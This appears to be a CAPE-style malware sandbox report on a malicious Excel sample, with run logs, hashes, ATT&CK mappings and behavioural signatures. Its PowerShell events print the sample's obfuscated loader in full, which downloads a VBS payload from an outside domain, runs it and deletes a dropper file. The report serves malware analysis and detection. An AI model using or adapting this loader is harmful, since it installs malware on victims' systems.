2025-12-08 08:33:02,486 [root] DEBUG: 2468: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:33:02,486 [root] DEBUG: 2468: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:33:02,486 [root] DEBUG: 2468: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:33:02,501 [root] DEBUG: 2468: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x75920000: C:\Windows\System32\wininet (0x1e4000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x74960000: C:\Windows\system32\version (0x9000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x77630000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:33:02,517 [root] DEBUG: 2468: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:33:02,533 [root] DEBUG: 2468: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:33:02,533 [root] DEBUG: 2468: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:33:02,533 [root] DEBUG: 2468: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:33:02,533 [root] DEBUG: 2468: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:33:02,533 [root] DEBUG: 2468: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:33:02,533 [root] DEBUG: 2468: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:33:02,548 [root] DEBUG: 2468: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:33:02,548 [root] DEBUG: 2468: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:33:02,548 [root] DEBUG: 2468: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:33:02,548 [root] DEBUG: 2468: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:33:07,220 [root] DEBUG: 3252: DLL loaded at 0x74200000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2025-12-08 08:33:07,220 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3252, handle 0x304: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
2025-12-08 08:33:07,548 [root] INFO: Process with pid 2468 has terminated
2025-12-08 08:33:07,548 [root] DEBUG: 2468: NtTerminateProcess hook: Attempting to dump process 2468
2025-12-08 08:33:07,548 [root] DEBUG: 2468: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:33:23,220 [root] DEBUG: 3284: api-cap: NtSetTimerEx hook disabled due to count: 5001
2025-12-08 08:33:23,220 [root] DEBUG: 3284: api-cap: NtSetTimerEx hook disabled due to count: 5001
2025-12-08 08:34:10,189 [root] DEBUG: 3284: api-cap: NtFindAtom hook disabled due to count: 5000
2025-12-08 08:35:03,970 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-08 08:35:03,970 [lib.api.process] INFO: Terminate event set for <Process 3284 EXCEL.EXE>
2025-12-08 08:35:03,970 [root] DEBUG: 3284: Terminate Event: Attempting to dump process 3284
2025-12-08 08:35:04,017 [root] DEBUG: 3284: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:04,033 [root] DEBUG: 3284: Terminate Event: Current region empty
2025-12-08 08:35:04,033 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\LCSSW.txt
2025-12-08 08:35:04,033 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\~DFD8375274759C4F6D.TMP
2025-12-08 08:35:04,033 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\~DF0D16C1186A1654C4.TMP
2025-12-08 08:35:04,033 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls
2025-12-08 08:35:04,033 [root] DEBUG: 3284: Terminate Event: CAPE shutdown complete for process 3284
2025-12-08 08:35:04,033 [lib.api.process] INFO: Termination confirmed for <Process 3284 EXCEL.EXE>
2025-12-08 08:35:04,033 [root] INFO: Terminate event set for process 3284
2025-12-08 08:35:04,033 [root] DEBUG: 556: Terminate Event: Attempting to dump process 556
2025-12-08 08:35:04,033 [root] DEBUG: 556: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:04,033 [root] DEBUG: 556: Terminate Event: Current region empty
2025-12-08 08:35:04,033 [root] DEBUG: 556: Terminate Event: CAPE shutdown complete for process 556
2025-12-08 08:35:04,033 [lib.api.process] INFO: Terminate event set for <Process 556 svchost.exe>
2025-12-08 08:35:09,033 [lib.api.process] INFO: Termination confirmed for <Process 556 svchost.exe>
2025-12-08 08:35:09,033 [root] INFO: Terminate event set for process 556
2025-12-08 08:35:09,033 [lib.api.process] INFO: Terminate event set for <Process 1236 explorer.exe>
2025-12-08 08:35:09,033 [root] DEBUG: 1236: Terminate Event: Attempting to dump process 1236
2025-12-08 08:35:09,033 [root] DEBUG: 1236: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:09,033 [root] DEBUG: 1236: Terminate Event: Current region empty
2025-12-08 08:35:09,033 [lib.api.process] INFO: Termination confirmed for <Process 1236 explorer.exe>
2025-12-08 08:35:09,033 [root] INFO: Terminate event set for process 1236
2025-12-08 08:35:09,033 [root] DEBUG: 1236: Terminate Event: CAPE shutdown complete for process 1236
2025-12-08 08:35:09,033 [root] DEBUG: 376: Terminate Event: Attempting to dump process 376
2025-12-08 08:35:09,033 [root] DEBUG: 376: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:09,033 [lib.api.process] INFO: Terminate event set for <Process 376 services.exe>
2025-12-08 08:35:09,033 [root] DEBUG: 376: Terminate Event: Current region empty
2025-12-08 08:35:09,033 [lib.api.process] INFO: Termination confirmed for <Process 376 services.exe>
2025-12-08 08:35:09,033 [root] INFO: Terminate event set for process 376
2025-12-08 08:35:09,033 [root] DEBUG: 376: Terminate Event: CAPE shutdown complete for process 376
2025-12-08 08:35:09,033 [lib.api.process] INFO: Terminate event set for <Process 3664 svchost.exe>
2025-12-08 08:35:09,033 [root] DEBUG: 3664: Terminate Event: Attempting to dump process 3664
2025-12-08 08:35:09,033 [root] DEBUG: 3664: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:09,033 [root] DEBUG: 3664: Terminate Event: Current region empty
2025-12-08 08:35:09,033 [lib.api.process] INFO: Termination confirmed for <Process 3664 svchost.exe>
2025-12-08 08:35:09,033 [root] DEBUG: 3664: Terminate Event: CAPE shutdown complete for process 3664
2025-12-08 08:35:09,033 [root] INFO: Terminate event set for process 3664
2025-12-08 08:35:09,033 [lib.api.process] INFO: Terminate event set for <Process 3252 OfficeClickToRun.exe>
2025-12-08 08:35:09,033 [root] DEBUG: 3252: Terminate Event: Attempting to dump process 3252
2025-12-08 08:35:09,048 [root] DEBUG: 3252: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:35:09,048 [root] DEBUG: 3252: Terminate Event: Current region empty
2025-12-08 08:35:09,048 [lib.api.process] INFO: Termination confirmed for <Process 3252 OfficeClickToRun.exe>
2025-12-08 08:35:09,048 [root] INFO: Terminate event set for process 3252
2025-12-08 08:35:09,048 [root] DEBUG: 3252: Terminate Event: CAPE shutdown complete for process 3252
2025-12-08 08:35:09,048 [root] INFO: Created shutdown mutex
2025-12-08 08:35:10,048 [root] INFO: Shutting down package
2025-12-08 08:35:10,048 [root] INFO: Stopping auxiliary modules
2025-12-08 08:35:10,048 [root] INFO: Stopping auxiliary module: Browser
2025-12-08 08:35:10,048 [root] INFO: Stopping auxiliary module: Curtain
2025-12-08 08:35:10,064 [lib.common.results] INFO: Uploading file C:\curtain.log to curtain/1765154110.0644531.curtain.log; Size is 16992; Max size: 100000000
2025-12-08 08:35:10,064 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-08 08:35:10,064 [root] INFO: Stopping auxiliary module: Evtx
2025-12-08 08:35:10,080 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Application.evtx to zip dump
2025-12-08 08:35:10,080 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\HardwareEvents.evtx to zip dump
2025-12-08 08:35:10,080 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Internet Explorer.evtx to zip dump
2025-12-08 08:35:10,080 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Key Management Service.evtx to zip dump
2025-12-08 08:35:10,080 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Microsoft-Windows-Sysmon%4Operational.evtx to zip dump
2025-12-08 08:35:10,111 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\OAlerts.evtx to zip dump
2025-12-08 08:35:10,111 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Security.evtx to zip dump
2025-12-08 08:35:10,111 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Setup.evtx to zip dump
2025-12-08 08:35:10,111 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\System.evtx to zip dump
2025-12-08 08:35:10,111 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Windows PowerShell.evtx to zip dump
2025-12-08 08:35:10,236 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host
2025-12-08 08:35:10,236 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 348919; Max size: 100000000
2025-12-08 08:35:10,251 [root] INFO: Stopping auxiliary module: Human
2025-12-08 08:35:12,455 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-08 08:35:12,455 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 08:35:14,298 [root] INFO: Stopping auxiliary module: Usage
2025-12-08 08:35:14,330 [root] INFO: Stopping auxiliary module: During_script
2025-12-08 08:35:14,330 [root] INFO: Finishing auxiliary modules
2025-12-08 08:35:14,330 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-08 08:35:14,330 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat to files\42f9c76ccf7a86c64d1244263a0ff86751e86e025a5996c938bd49c2e24714a1; Size is 128; Max size: 100000000
2025-12-08 08:35:14,330 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive to files\a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf; Size is 64; Max size: 100000000
2025-12-08 08:35:14,330 [lib.common.results] INFO: Uploading file C:\PSTranscripts\20251208\PowerShell_transcript.USERDUM-NNN0BL9.awDK_ja3.20251208163520.txt to files\f7c8cdb5f37a775df2a3f475b4c5fe22e15f49237f425cc39bec76d77c630534; Size is 2089; Max size: 100000000
2025-12-08 08:35:14,345 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\USERDUM-NNN0BL9-20251208-1633.log to files\c8d5cab68150e48c4a709d2c31bc440a10417c61527fb81eabd437698ade3a7f; Size is 6746; Max size: 100000000
2025-12-08 08:35:14,345 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\LCSSW.txt to files\a954043909b90d12ab1659e2d28adb236b4ac521084282448757f7b1fd8d8b05; Size is 621; Max size: 100000000
2025-12-08 08:35:14,345 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\~DFD8375274759C4F6D.TMP to files\6db1d81bfc54c3619aa753c32e4d005515f8733fe0c7ce9c91f5a87d158b52a1; Size is 16384; Max size: 100000000
2025-12-08 08:35:14,361 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\~DF0D16C1186A1654C4.TMP to files\069f951aff24b4ae5206979364354f959136a1d911f1edfd8a9137c88f5934e3; Size is 16384; Max size: 100000000
2025-12-08 08:35:14,361 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls to files\46238cd852404cabda8eff45dfd165691b1b265a2510a07f573ccbaef2b7b7ce; Size is 35328; Max size: 100000000
2025-12-08 08:35:14,361 [root] WARNING: Folder at path "C:\WcVPSdVSz\debugger" does not exist, skipping
2025-12-08 08:35:14,361 [root] WARNING: Folder at path "C:\WcVPSdVSz\tlsdump" does not exist, skipping
2025-12-08 08:35:14,361 [root] INFO: Analysis completed

    

    

    

    

Machine

Name Label Manager Started On Shutdown On Route
win7-32bit-1 win7-32bit-1 KVM 2025-12-08 16:39:19 2025-12-08 16:42:45 inetsim

File Details

File Name
72a01610de72cacddef9.zip
File Type Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
File Size 15218 bytes
MD5 ca204ca48de7cd6e76c95457ae5eb6c0
SHA1 73dcd55413e5e7c261e979d9c42d8d9fdd904b9c
SHA256 b37f667867cf9914d4441b882d63ab02242c40741de02836f5106f70da2083db [VT] [MWDB] [Bazaar]
SHA3-384 a29f8687c36883de194174d8ab6f22e93d6abd6d6e238a6d858824e846f99122ca639a2c7d70d4069d815840f1be4cb6
CRC32 B3CF4AF1
TLSH T10962D05A1DF5E77AC944690DF26281753CA5985C0F8FCDFA8D18D8DB52015EBE3800BE
Ssdeep 384:kBi/fVsFZTvk6zsCcTT4i+SzKbyzrzDmv/jGcUE4mt:5/AZTM6z3w4pQKba/m/Cc54M
File BinGraph Vba2Graph

CMQ{}
$tD.J
o*,NyD
ce;4\
sr_n:
Vdv ^0wTz
d;K{`
SV~dj
8kNFR.G
_0g&5
8&RG3c)
u"(pt~fK
` hMt
72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls
1,O*c;
Q(P=t
(DUc>
-0q<MH
)m-i4(
Bd/PRw
= 4Ou
#E[O'
WpEZH-r
(m9P-
W5d7A
m^E"!
^55)v<
Ql3)u
I0#X-
;-,LE
_"y%:
*y Z@
F<[C.
#+yD4
jW<?V
R!dL^
"HN9_
R[JMt
@=[P.
r)[@|t
X?ryi
><Q3=
Wdzjzm
0yf#,Usg
y`#%#
U\05H
(_,N*
T>=}S
<m?96
3qHKW
+92]Z
}kEqv
p\ThS-/
c|RkZ12x
J-!&K
=3"&R
M|SeF
*S`-\
uja@q
wH/<4
"-Td%
lH3G
`wrJ#*
1[yw<=
2J7ctxw
Reports: JSON HTML Lite

Event: 02

$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js'){-join($_[-1..-$_.Length])}(New-Object Net.WebClient).DownloadFile('http://fisintegrateds.com/zp-admin/Protected Client.vbs',$env:temp+'\notepad.vbs')$global:?

Event: 01

Error Message = This command cannot be run due to the error: The system cannot find the file specified.
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

Event: 02

$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton''+pmet:vne$,''sbv.tneilC detcetorP/nimda-pz/moc.sdetargetnisif//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs');remove-item ($env:appdata + '\LCSSW.js'){-join($_[-1..-$_.Length])}(New-Object Net.WebClient).DownloadFile('http://fisintegrateds.com/zp-admin/Protected Client.vbs',$env:temp+'\notepad.vbs')$global:?

Event: 01

No alteration of event.


Defense Evasion Discovery Command and Control Execution Privilege Escalation
  • T1564 - Hide Artifacts
    • stealth_window
  • T1202 - Indirect Command Execution
    • uses_windows_utilities
  • T1562 - Impair Defenses
    • office_security
  • T1036 - Masquerading
    • network_connection_via_suspicious_process
    • accesses_public_folder
  • T1055 - Process Injection
    • network_connection_via_suspicious_process
    • resumethread_remote_process
  • T1112 - Modify Registry
    • office_security
  • T1548 - Abuse Elevation Control Mechanism
    • accesses_public_folder
  • T1070 - Indicator Removal
    • deletes_executed_files
    • deletes_files
  • T1064 - Scripting
    • powershell_command_suspicious
    • powershell_scriptblock_logging
    • suspicious_js_script
    • powershell_variable_obfuscation
    • script_created_process
    • powershell_network_connection
    • script_tool_executed
  • T1562.001 - Disable or Modify Tools
    • office_security
  • T1027 - Obfuscated Files or Information
    • powershell_variable_obfuscation
  • T1564.003 - Hidden Window
    • stealth_window
  • T1070.004 - File Deletion
    • deletes_files
  • T1082 - System Information Discovery
    • recon_fingerprint
    • user_discovery
    • antivm_checks_available_memory
  • T1012 - Query Registry
    • recon_fingerprint
  • T1071 - Application Layer Protocol
    • reads_self
    • http_request
    • dynamic_function_loading
    • cmdline_reversed_http_link
    • dead_connect
    • powershell_network_connection
  • T1132 - Data Encoding
    • cmdline_reversed_http_link
  • T1106 - Native API
    • antidebug_guardpages
  • T1059 - Command and Scripting Interpreter
    • powershell_command_suspicious
    • powershell_scriptblock_logging
    • cmdline_reversed_http_link
    • suspicious_js_script
    • long_commandline
    • powershell_variable_obfuscation
    • script_created_process
    • powershell_network_connection
    • script_tool_executed
  • T1064 - Scripting
    • powershell_command_suspicious
    • powershell_scriptblock_logging
    • suspicious_js_script
    • powershell_variable_obfuscation
    • script_created_process
    • powershell_network_connection
    • script_tool_executed
  • T1059.001 - PowerShell
    • powershell_variable_obfuscation
    • powershell_command_suspicious
    • powershell_scriptblock_logging
    • powershell_network_connection
  • T1055 - Process Injection
    • network_connection_via_suspicious_process
    • resumethread_remote_process
  • T1548 - Abuse Elevation Control Mechanism
    • accesses_public_folder

Usage


Processing ( 6.54 seconds )

  • 4.852 CAPE
  • 1.048 BehaviorAnalysis
  • 0.618 Heatmap
  • 0.013 NetworkAnalysis
  • 0.003 AnalysisInfo
  • 0.001 Curtain
  • 0.001 Debug

Signatures ( 0.26 seconds )

  • 0.068 antiav_detectreg
  • 0.029 territorial_disputes_sigs
  • 0.025 infostealer_ftp
  • 0.014 antianalysis_detectreg
  • 0.014 infostealer_im
  • 0.01 infostealer_mail
  • 0.008 masquerade_process_name
  • 0.007 antiav_detectfile
  • 0.007 antivm_vbox_keys
  • 0.005 antivm_vmware_keys
  • 0.004 antianalysis_detectfile
  • 0.004 ketrican_regkeys
  • 0.004 darkcomet_regkeys
  • 0.004 infostealer_bitcoin
  • 0.003 antidebug_devices
  • 0.003 antivm_generic_diskreg
  • 0.003 antivm_parallels_keys
  • 0.003 antivm_vbox_files
  • 0.003 antivm_xen_keys
  • 0.003 geodo_banking_trojan
  • 0.003 ransomware_files
  • 0.003 remcos_regkeys
  • 0.002 antivm_vpc_keys
  • 0.002 poullight_files
  • 0.002 ransomware_extensions
  • 0.002 limerat_regkeys
  • 0.002 recon_fingerprint
  • 0.001 network_dyndns
  • 0.001 accesses_netlogon_regkey
  • 0.001 antivm_bochs_keys
  • 0.001 antivm_generic_bios
  • 0.001 antivm_hyperv_keys
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vmware_files
  • 0.001 browser_security
  • 0.001 bypass_firewall
  • 0.001 registry_credential_store_access
  • 0.001 registry_lsa_secrets_access
  • 0.001 disables_backups
  • 0.001 disables_browser_warn
  • 0.001 qulab_files
  • 0.001 packer_armadillo_regkey
  • 0.001 medusalocker_regkeys
  • 0.001 revil_mutexes
  • 0.001 modirat_behavior
  • 0.001 rat_pcclient
  • 0.001 warzonerat_regkeys
  • 0.001 ursnif_behavior

Reporting ( 0.17 seconds )

  • 0.058 JsonDump
  • 0.054 LiteReport
  • 0.05 ReportHTML
  • 0.006 MITRE_TTPS

Signatures

Checks available memory
Attempts to connect to a dead IP:Port (2 unique times)
IP: 172.61.0.2:443
IP: 172.61.0.2:80
Queries the keyboard layout
A file was accessed within the Public folder.
file: C:\Users\Public\Documents\desktop.ini
file: C:\Users\Public\Desktop\desktop.ini
file: C:\Users\Public\Desktop
file: C:\Users\Public\desktop.ini
file: C:\Users\Public\Documents
SetUnhandledExceptionFilter detected (possible anti-debug)
Checks adapter addresses which can be used to detect virtual network interfaces
Office loads COM DLLs, indicative of Office Macros spawning CMD process for execution
Office loads VB DLLs, indicative of Office Macros
Suspicious behavior was detected in a PowerShell process by script block logging
1876: Downloader, Starts Process, Compression, Uses Stealth, Screen Scraping, Custom Web Fields, Sleeps, Uninstalls Apps, Obfuscation, Enumeration/Profiling, Sends Data, AppLocker Bypass, AMSI Bypass, Disables Windows Defender, Clear Logs, Invokes C# .NET Assemblies, Modifies Shadowcopy
Possible date expiration check, exits too soon after checking local time
process: powershell.exe, PID 1876
Guard pages use detected - possible anti-debugging.
Deletes files from disk
DeletedFile: C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
DeletedFile: C:\Users\user\AppData\Local\Temp\Excel8.0\MSComctlLib.exd
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
DeletedFile: C:\Users\user\AppData\Local\Temp\2k4ha12y.rev.ps1
DeletedFile: C:\Users\user\AppData\Local\Temp\0ro50elk.i5p.psm1
DeletedFile: C:\Users\user\AppData\Local\Temp\notepad.vbs
DeletedFile: C:\Users\user\AppData\Roaming\LCSSW.js
Makes WinAPI calls related to user discovery
Resolved address: wpad - {''}
Resolved address: activation.sls.microsoft.com - {''}
Resolved address: config.edge.skype.com - {''}
Resolved address: ocos-office365-s2s.msedge.net - {''}
Resolved address: fisintegrateds.com - {''}
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/CreateEventExW
DynamicLoader: kernel32.dll/CreateSemaphoreExW
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/CreateThreadpoolTimer
DynamicLoader: kernel32.dll/SetThreadpoolTimer
DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: kernel32.dll/CloseThreadpoolTimer
DynamicLoader: kernel32.dll/CreateThreadpoolWait
DynamicLoader: kernel32.dll/SetThreadpoolWait
DynamicLoader: kernel32.dll/CloseThreadpoolWait
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: kernel32.dll/GetCurrentProcessorNumber
DynamicLoader: kernel32.dll/GetLogicalProcessorInformation
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: kernel32.dll/SetDefaultDllDirectories
DynamicLoader: kernel32.dll/EnumSystemLocalesEx
DynamicLoader: kernel32.dll/CompareStringEx
DynamicLoader: kernel32.dll/GetDateFormatEx
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/GetTimeFormatEx
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/IsValidLocaleName
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/GetFileInformationByHandleExW
DynamicLoader: kernel32.dll/SetFileInformationByHandleW
DynamicLoader: c2r32.dll/HandleError
DynamicLoader: c2r32.dll/HandleErrorEx
DynamicLoader: c2r32.dll/IsStreaming
DynamicLoader: c2r32.dll/GetConfiguration
DynamicLoader: c2r32.dll/StreamFault
DynamicLoader: c2r32.dll/LoadRange
DynamicLoader: c2r32.dll/GetFileDiskRanges
DynamicLoader: c2r32.dll/GetFileMemRanges
DynamicLoader: c2r32.dll/EnsureDir
DynamicLoader: c2r32.dll/EnsureFile
DynamicLoader: c2r32.dll/LoadFile
DynamicLoader: c2r32.dll/LoadMemory
DynamicLoader: c2r32.dll/HandleStreamFault
DynamicLoader: c2r32.dll/RecordDataFault
DynamicLoader: c2r32.dll/RecordStreamFaultTime
DynamicLoader: c2r32.dll/IsRecording
DynamicLoader: c2r32.dll/HandleLoadIconW
DynamicLoader: c2r32.dll/HandleLoadIconA
DynamicLoader: c2r32.dll/HandleLoadCursorW
DynamicLoader: c2r32.dll/HandleLoadCursorA
DynamicLoader: c2r32.dll/HandleLoadBitmapW
DynamicLoader: c2r32.dll/HandleLoadBitmapA
DynamicLoader: c2r32.dll/HandleLoadImageW
DynamicLoader: c2r32.dll/HandleLoadImageA
DynamicLoader: c2r32.dll/HandleLoadResource
DynamicLoader: c2r32.dll/EnsureResource
DynamicLoader: c2r32.dll/SetEnsureResourceW
DynamicLoader: c2r32.dll/SetEnsureResourceA
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ntdll.dll/NtOpenKey
DynamicLoader: ntdll.dll/NtOpenKeyEx
DynamicLoader: ntdll.dll/NtOpenKeyTransacted
DynamicLoader: ntdll.dll/NtOpenKeyTransactedEx
DynamicLoader: ntdll.dll/NtDeleteKey
DynamicLoader: ntdll.dll/NtFlushKey
DynamicLoader: ntdll.dll/NtCreateKey
DynamicLoader: ntdll.dll/NtCreateKeyTransacted
DynamicLoader: ntdll.dll/NtEnumerateKey
DynamicLoader: ntdll.dll/NtQueryKey
DynamicLoader: ntdll.dll/NtQueryObject
DynamicLoader: ntdll.dll/NtSetInformationKey
DynamicLoader: ntdll.dll/NtQueryValueKey
DynamicLoader: ntdll.dll/NtEnumerateValueKey
DynamicLoader: ntdll.dll/NtSetValueKey
DynamicLoader: ntdll.dll/NtDeleteValueKey
DynamicLoader: ntdll.dll/NtRenameKey
DynamicLoader: ntdll.dll/NtQueryMultipleValueKey
DynamicLoader: ntdll.dll/NtNotifyChangeKey
DynamicLoader: ntdll.dll/NtNotifyChangeMultipleKeys
DynamicLoader: ntdll.dll/NtQuerySecurityObject
DynamicLoader: ntdll.dll/NtSetSecurityObject
DynamicLoader: ntdll.dll/NtDuplicateObject
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtOpenFile
DynamicLoader: ntdll.dll/NtDeleteFile
DynamicLoader: ntdll.dll/NtQueryAttributesFile
DynamicLoader: ntdll.dll/NtQueryFullAttributesFile
DynamicLoader: ntdll.dll/NtQueryDirectoryFile
DynamicLoader: ntdll.dll/NtSetInformationFile
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: kernel32.dll/CreateActCtxA
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: ntdll.dll/NtQueryInformationFile
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetCurrentDirectoryA
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CoCreateInstance
